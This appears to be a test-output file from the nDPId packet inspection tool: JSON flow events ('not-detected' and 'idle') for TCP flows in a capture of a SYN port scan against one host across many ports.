-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1755,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1755,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1061,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1061,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1761,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1761,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3809,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1761,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1761,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3809,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5859,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5859,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5859,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5859,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5862,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3814,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5862,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3814,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9968,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060496,"flow_last_seen":1278275060496,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060496,"flow_last_seen":1278275060496,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7921,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7921,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9968,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060598,"flow_last_seen":1278275060598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060598,"flow_last_seen":1278275060598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7921,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7921,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3826,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 